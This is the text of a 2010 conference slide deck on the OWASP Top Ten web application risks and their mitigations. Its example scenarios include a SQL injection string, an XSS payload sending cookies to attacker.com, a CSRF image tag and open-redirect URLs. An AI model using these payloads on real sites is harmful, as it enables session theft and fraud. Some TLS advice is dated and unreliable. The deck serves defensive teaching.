This document summarizes a presentation on web application security risks. It discusses how most web applications are not securely developed by default and are vulnerable to attacks like injection and cross-site scripting. It introduces the OWASP Top 10 project, which identifies the top 10 security risks faced by web applications. The presentation focuses on the risks of injection and cross-site scripting attacks, and approaches for mitigating these risks, including using frameworks like Spring Security and the OWASP Enterprise Security API.
1. Hacking & OS
Is my web application secure?
OWASP Top Ten Security Risks and beyond
Carlo Bonamico
carlo.bonamico@nispro.it
NIS s.r.l. / JUG Genova
http://www.nispro.it / http://juggenova.net
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
2. Is my application secure?
Most likely not... :-(
we're used to Java/.NET
robustness to buffer overflow
with respect to C/C++
but now Rich Internet
Applications & AJAX bring new
challenges
Injection, XSS,
Request Forgery...
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
3. We will talk about... Acknowledgement
The Top Ten list
Why is (WebApp) Security complex? and several concepts
are reproduced under
security beyond buffer overflows OWASP's CC license
What about OWASP and Risk-based security approaches?
The OWASP Top Ten with focus on
Injection and Cross Site Scripting
Risk Mitigation approaches & tools (Spring Security, ESAPI... )
And beyond...
additional tools and techniques
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
4. What is security
From Wikipedia: Protection of Information and Information System
from attacks, misues, intentional and unintentional manipulation, destruction,
service disruption
4 guarantees
Integrity
Availability
Confidentiality
Accountability
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
5. Why is security difficult?
Intrinsic complexity of
information
tools
systems
processes
“false” security perception
risks often difficult to estimate and measure
Seen only as a cost, valued only when is missing
did not happen to me
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
6. Consequences
Security problems often are not even detected
Security is added after-the-fact
increasing costs
limited effectiveness
Not part of
development processes
testing processes
standard training
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
7. State of the art
Security technologies
constant improvement
But main concept is Security as a process
includes human factors, usability issues
includes scale issues
Effective Security involves Risk Management
evaluate and compare risks
mitigate when you cannot eliminate
Relate security to value
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
8. Web Application Security
Specific issues
complexity of network and protocols
power of current Browsers
interaction of heterogeneous sites, often under unrelated management
Most websites are almost open
(in)security through obscurity
social engineering attacks are easier
Need for specific approaches and tools
Need for defense in depth
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
9. Recommended Books
Secrets & Lies
Digital Security in a Networked World
by Bruce Schneier
http://www.schneier.com
John Wiley & Sons, 2000
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
10. OWASP
The Open Web Application Security Project is an open-source application
security organization
includes corporations, educational organizations, and individuals
creates freely-available articles, methodologies, documentation & tools
not affiliated with any company
OWASP approaches application security by considering all dimensions
people, process, technology
focus on developers
beyond patching...
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
12. And now...
OWASP Top Ten for 2010
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
13. Before we begin: OWASP recommendations...
Don’t stop at 10
see OWASP Developer's Guide, OWASP Testing Guide, OWASP Code Review Guide
constant stream of new attacks from “the future”
Think positive
stop chasing vulnerabilities
focus on establishing strong application security controls
Application Security Verification Standard (ASVS)
use tools wisely
Move towards a secure software development life-cycle is used (SDLC)
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
14. Top Ten Security Risks for 2010
A1: Injection A6: Security Misconfiguration
A2: CrossSite Scripting (XSS) A7: Insecure Cryptographic Storage
A3: Broken Authentication and Session A8: Failure to Restrict URL Access
Management A9: Insufficient Transport Layer
A4: Insecure Direct Object References Protection
A5: CrossSite Request Forgery (CSRF) A10: Unvalidated Redirects and Forward
What is it?
a list of the top 10 security Risks on the Web today
risks, not most common weaknesses
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
15. Risk Analysis approach
OWASP approach based on standard methodologies
customized for application security
http://www.owasp.org/index.php/Threat_Risk_Modeling
Standard model
Risk = Likelihood * Impact
factors in "likelihood" and "impact" for application security
how to combine them
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
16. How are the risk evaluated?
Threat Agent Weakness Detectability
application-specific easy, average, difficult
Attack Vector Technical Impact
easy, average, difficult severe, moderate, minor
Weakness Prevalence Business Impact
widespread, common, application-specific
uncommon
worst case approach
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
17. What is an attack?
Attacks are the techniques that agents use to exploit the vulnerabilities in
applications
Attacks are often confused with vulnerabilities
http://www.owasp.org/index.php/Category:Attack
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
18. What is a vulnerability?
A vulnerability is a hole or a weakness in the application
a design flaw or an implementation bug
that allows an attacker to cause harm to the stakeholders of an application
http://www.owasp.org/index.php/Category:Vulnerability
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
19. What is a control
Controls are defensive technologies or modules that are used to detect, deter,
or deny attacks
Examples
Authentication, Authorization, Auditing
Session Management
Input Validation
Error Handling
Cryptography
http://www.owasp.org/index.php/Category:Control
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
20. Sources of vulnerabilities
Missing control
no encryption of sensitive information
no access control on protected pages
Broken control
weak hash algorithm
fail open
Ignored Control
control present but not activated
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
21. Impact Analysis
Technical impact
on the application, the data it uses, and the functions it provides
loss of Integrity, Availability, Confidentiality, Accountability
Business impact
on process, product, service
customer relationship, reputation
law compliance
out-of-business
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
22. What & How to Fix
Fix the most severe risks first
does not help to fix the easy or cheap ones if they're not significant
Not all risks are worth fixing
cost of fix vs potential damage
As much as possible, re-use existing, sound, tested libraries and components
Spring Security
modular, open, not just for Spring apps
ESAPI
easy to use security controls
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
23. OWASP Enterprise Security API
A free, open source, web application security control library
make it easier to write lower-risk applications
make it easy to retrofit security into existing code
Language-specific versions
JAVA, .NET, PHP, Ruby...
Standard controls + extensible interfaces
ESAPI.encoder(), ESAPI.validator()
ESAPI.encryptor()
ESAPI.authenticator(),
ESAPI.accessController()
ESAPI.httpUtilities()
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
24. ESAPI References
Introduction to ESAPI
http://www.slideshare.net/denimgroup/enterprise-security-api-esapi-java-
java-user-group-san-antonio
http://www.owasp.org/images/c/c7/ESAPI-2010-AppSecDC.pptx
ESAPI mapped to the Top Ten
http://www.jtmelton.com/2009/01/03/the-owasp-top-ten-and-esapi/
Samples
http://code.google.com/p/owasp-esapi-java-swingset
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
25. A1 Injection
Threat Agents
internal or external actor who can feed untrusted data
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: COMMON / Detectability: AVERAGE
Technical Impacts
SEVERE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
26. How it works
Attacker sends some special text that is executed by the target interpreter
any source of data is at risk: form fields, uploads, url parameters
Wide range of cases, according to the interpreter
SQL executor, LDAP, Xpath, OS commands, URL arguments
easy to discover when examining code
more difficult via testing
can result in
data loss or corruption, lack of accountability, or denial of access, sometimes
complete host takeover
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
27. Example Scenario: SQL Injection
Quick and dirty JDBC code
String query = "SELECT * FROM accounts
WHERE custID='" +
request.getParameter("id") +"'";
The attacker sends an 'id' parameter
http://example.com/app/accountView?id=' or 1'='1
View other accounts
In the worst case, the attacker uses this weakness to invoke
special stored procedures or DDL queries
allowing a complete db manipulation
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
28. Preventing SQL Injection
Never create Statements with string manipulation
Always use PreparedStatement or CallableStatement
or a framework based on them (e.g. iBatis / myBatis, Spring JdbcTemplate)
With Hibernate/JPA HQL Injection is still possible
always use “by-name” parameters
from EntityName where id=:id
Defense in depth
minimal privileges on the DB connection
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
29. Hibernate & JPA
Uses PreparedStatements and SQL validation
Vulnerable to HQL injection
prefer named parameters
use Criteria queries when programmatically constructing them
See also
http://www.owasp.org/index.php/Hibernate
http://www.owasp.org/index.php/Hibernate-Guidelines
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
30. Other platforms
.NET
use parameterized APIs with parameter binding
SqlCommand(), OleDbCommand()
PHP
use PDO
with strongly typed bindParam()
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
32. A2 XSS
Threat Agents
internal or external actor who can feed untrusted data
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: VERY WIDESPREAD / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
33. How it works
Attacker sends special text that sooner or later is delivered to another web
browser
and executed... typically as JavaScript
almost any source of data can be an attack vector
XSS is the most prevalent web application security flaw
as an example, JSP EL Expressions like ${…} are immediately evaluated and
printed to the page “as is”, thus propagating XSS
And comes in three flavors
1) Stored, 2) Reflected, 3) DOM based
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
34. Example Scenarios
The application dynamically generates an input field without validation or
escaping
out.println(“〈input name='creditcard' value='"
+ request.getParameter(“CC”) + "'〉”;
The attacker modifies the ‘CC’ parameter in their browser to
'〉〈script〉document.location= 'http://www.attacker.com/saveCookie?
id='+document.cookie〈/script〉'
The victim’s session ID is sent to the attacker
ready for hijacking
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
35. XSS Prevention
Untrusted Data of any kind
from any source
HTTP request, URL parameters, form fields, headers, cookies
databases, web services, uploaded files...
should always be treated as though it contains an attack
since browser are the worst mix of code and data
many different parsers (XML, HTML, JavaScript, VBScript, CSS, URL, etc...).
sanitized → encoded BEFORE being displayed or forwarded
escaping never harms
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
36. OWASP Positive XSS Prevention Model
An HTML page like a template
with slots where a developer is allowed to put untrusted data
untrusted data is not allowed elsewhere
"whitelist" model
similar to Firefox 4 Content Security Policy
Each of the different types of slots has slightly different security rules
attributes, body, urls, links, ...
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
38. References
Consider employing Mozilla’s new Content Security Policy
coming out in Firefox 4
Cheat Sheets
http://ha.ckers.org/xss.html
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_
Cheat_Sheet
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
39. A3 Broken Authentication and Session Management
Threat Agents
legitimate users, external, insider
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: COMMON / Detectability: AVERAGE
Technical Impacts
SEVERE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
40. Weaknesses
Developers frequently build custom authentication and session management
schemes
but building these correctly is hard
Defects in areas such as
logout, password management, timeouts, remember me, secret question, account
update, etc.
Admin/special accounts are mostly targeted
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
41. Example Scenario
A) Website uses URL rewriting, leaving session ID in clear
http://travel.com/bookFlight;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?
dest=Australia
link is shared in an email
sessionID goes around unencrypted
B) Exceptions during login validation are not properly handled
alter the execution path
causing an unauthorized access
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
42. Things to be checked
Are credentials always protected when stored
using hashing or encryption?
Can credentials be guessed or altered during account management
account creation, change password, recover password?
Are session IDs
exposed in the URL (e.g., URL rewriting)?
vulnerable to session fixation?
rotated after successful login?
Are passwords, session IDs, and credentials sent only over TLS ?
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
43. Solid Authentication and Session Management
Use a single set of strong authentication and session management controls
e.g. Spring Security and/or ESAPI Authenticator
Be sure to avoid XSS flaws
can be used to steal session Ids
Prevent brute force attacks
limit number of attempts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
44. A4-Insecure Direct Object References
Threat Agents
authorized users with partial access to data
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: COMMON / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
45. How it works
Attacker changes a parameter value
point to another entity for which he has not access rights
Applications often use a business key
easy to guess
Applications often do not check access to a URL after the user requests it
(false) security through obscurity
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
46. Example
Restrieve account data without verifications
query="SELECT * FROM accts WHERE code=?";
PreparedStatement pstmt =
connection.prepareStatement(query , ... );
pstmt.setString( 1,
request.getParameter("code"));
ResultSet results = pstmt.executeQuery();
The attacker modifies the ‘code’ parameter
http://example.com/app/accountInfo?acct=notmyacct
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
47. How Do I Prevent Insecure Direct Object References?
Use per user or session indirect object references.
instead of the resource’s database key
possibly generated through ESAPI
RandomAccessReferenceMap instance = new
RandomAccessReferenceMap();
String indirectKey =
instance.addDirectReference((Object)entity
);
Check access
propert authorization
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
48. A5-Cross-Site Request Forgery (CSRF)
Threat Agents
anyone who can trick your users into submitting a request to your website
Attack Vectors
Exploitability: AVERAGE
Security Weakness
Prevalence: WIDESPREAD / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
49. How it works
Any email or RSS feed or AD creates forged HTTP requests and tricks a victim
into submitting them
via image tags, XSS, or numerous other techniques
if the user is logged in, the attack succeeds.
Easy when request details are guessable
the browser automatically send cookies to the target server
making difficult to distinguish good requests from bad ones
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
50. Example
The application allows a user to submit a state changing request that does not
include anything secret. Like so:
http://example.com/app/transferFunds?
amount=1500&destinationAccount=4673243243
Attackers hides the link in an img
〈img
src="http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAc
ct#“ width="0" height="0" /〉
If the victim browser recently visited and logged into example.com, forged
requests will include the user’s session info
inadvertently authorizing the action
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
51. How Do I Prevent CSRF?
Include an unpredictable token in each HTTP request
e.g. hidden field, not included in the URL
session cookies, source IP addresses, and other information that is automatically
sent doesn’t count since this information is also included in forged requests
OWASP’s CSRF Guard
automatically include such tokens in your Java EE, .NET, or PHP application
ESAPI also includes token generators and validators
Also check HDIV framework
http://www.hdiv.org/
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
52. References
OWASP Cheat Sheet
http://www.owasp.org/index.php/Cross-
Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
53. A6-Security Misconfiguration
Threat Agents
anonymous & internal users wanting more access or to hide their actions
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: COMMON / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
54. How it works
Attacker accesses
default accounts
unused pages
unpatched flaws
unprotected files and directories
Security misconfiguration can happen at any level of an application stack
including the platform, web server, application server, framework, and custom
code
Automated scanners are useful
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
55. Administrative Interfaces
Are a critical entry point
to application servers, virtualization environments and operating systems
Enable them on separate channels
Ensure default access credentials are changed
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
56. How Do I Prevent Security Misconfiguration?
Use a repeatable hardening process that makes it fast and easy to deploy
secured platforms
disabling unnecessary components and services
enabling authentication
changing default credentials
see also devops
Setup a process for security updates and patches
Use minimal privileges everiwhere
Perform scans and audits
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
57. Configuration data
review configuration for unsafe defaults
frameworks
application server
web server
db
operating system
virtual machine
create a company-wide knowledge base of secure configs and hardening how-to
integrate with open ones, including OWASP's
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
59. How it works
Attackers typically don’t break the crypto
They break something else
e.g. use a keylogger
or access data via channels that automatically decrypt
The most common defect is simply not encrypting sensitive data
If using crypto, beware of
unsafe key generation and storage
weak algorithms
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
60. How Do I Prevent Insecure Cryptographic Storage?
App-specific, but at least:
make sure you encrypt all sensitive data
ensure offsite backups are encrypted, but keys managed separately
use strong standard algorithms and strong keys avoid
Do It Yourself
proper key management approaches
encrypted =
ESAPI.encryptor().encrypt( decrypted );
decrypted = ESAPI.encryptor()
.decrypt( encrypted );
Ensure passwords are hashed and salted
Ensure all keys and passwords are protected Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
61. A8-Failure to Restrict URL Access
Threat Agents
users wanting to access a private page or privileged page
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: UNCOMMON / Detectability: AVERAGE
Technical Impacts
MODERATE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
62. How it works
Attacker, who is an authorized system user, simply changes the URL to a
privileged page
Checks are not present
or
Checks are present but not configured correctly
or
Links to sensitive pages are hidden
but if direct URL is used they are not protected
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
63. How Do I Prevent Failure to Restrict URL Access?
Prefer role-based policies
to minimize the effort required to maintain tThe policies hem
Policies should be highly and easily configurable
to minimize hard coded aspects
The enforcement mechanism should deny all by default
requiring explicit grants
In workflow interactions
check all states
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
64. A9-Insufficient Transport Layer Protection
Threat Agents
anyone who can monitor the traffic of your users or backend connections
Attack Vectors
Exploitability: DIFFICULT
Security Weakness
Prevalence: COMMON / Detectability: EASY
Technical Impacts
MODERATE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
65. How it works
Monitoring network traffic can be difficult
but is sometimes easy
see wireshark...
Applications often use SSL/TLS only during authentication
exposing data and session IDs to interception
or only on the front-end
leaving back-end connections to DB or JMS Servers vulnerable
Systems use old versions of SSL protocols
subject to many flaws
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
66. How Do I Prevent Insufficient Transport Layer Protection?
Require SSL for all sensitive pages
redirected unsecure requests to the SSL page
Set the ‘secure’ flag on all sensitive cookies
Only support strong (e.g., FIPS 140-2 compliant) algorithms
at least TLS 1.0 SSL 3.0
Ensure your certificate is valid, not expired, not revoked,
and matches all domains used by the site
Backend and other connections should also use SSL
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
67. A10-Unvalidated Redirects and Forwards
Threat Agents
anyone who can trick your users into submitting a request to your website
Attack Vectors
Exploitability: EASY
Security Weakness
Prevalence: UNCOMMON / Detectability: EASY
Technical Impacts
Impact: MODERATE
Business Impacts
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
68. How it works
Attacker links to unvalidated redirect and tricks victims into clicking it
http://good.com/fwd?redir=bad.com/virus.exe
properly % encoded...
Victims are more likely to click on it, since the link is to a valid site
User manipulates parameter to forward to a protected page
http://good.com/forward?path=/WEB-INF/admin.jsp
Happens when the redirect/forward url comes from a request parameter
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
69. How Do I Prevent Unvalidated Redirects and Forwards?
Simply avoid using redirects and forwards
if used, don’t involve parameters in calculating the destination
else, check destination against valid list (ESAPI supports this)
and verify page authorizations
Better yet, use a parameter which is a key and not a full URL
http://good.com/fwd?path=1
Use
HTTPUtilities.sendSafeRedirect()
HTTPUtilities.safeEncodeRedirectURL()
HTTPUtilities.sendSafeForward()
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
70. More...
Additional Principles and Tools
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
71. Organizational commitment to security
Costs are not the main issue
most of the effort for secure applications also leads to better/more robust/more
productive applications
Focus and culture are
what's your priority?
Commercial aspects
would you sell a wonderful car with no keys?
Mostly
training, team effort, specialistic support
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
72. ESAPI Web Application Firewall (WAF)
Can be called separately from the other controls
Can add to an existing application
Virtual patches
Enforce authentication
Enforce access control
add input validations
add output encodings
Enforce HTTPS
sanitize HTTP headers and cookies
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
73. Pros and Cons
Easier and faster to apply patches without coding
no subsitute for propert design and implementation
mitigation solution
See also
http://www.slideshare.net/llamakong/owasp-esapi-waf-appsec-dc-2009
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
74. Application Layer Logging/Intrusion Detection
Really, important!
one of the most important security mechanisms
normally not done
ESAPI Intrusion detection Key features
Log Intrusion
Logout User
Disable Account
Configurable Thresholds
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
75. AppSensor
you report significant events by means of exceptions
invalid credentials
validation exceptions
AppSensor
collects them
presents them in a management console
produces alerts according to configurable thresholds
can take actions
lock accounts, disable IP clients
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
76. Proven application security principles
Apply defense in depth Keep security simple
Use a positive security model Detect intrusions
fail-safe defaults, minimize Don’t trust infrastructure
attack surface Don’t trust services
Fail securely
Run with least privilege
Avoid security by obscurity
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
77. Want to know more?
My blog
http://www.carlobonamico.com
My Company Thank you
http://www.nispro.it
for your attention!
JUG Genova
http://juggenova.net
Attend a course
Web Application Security (3 days)
http://www.nispro.it/education/education_focus_sec.html
Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova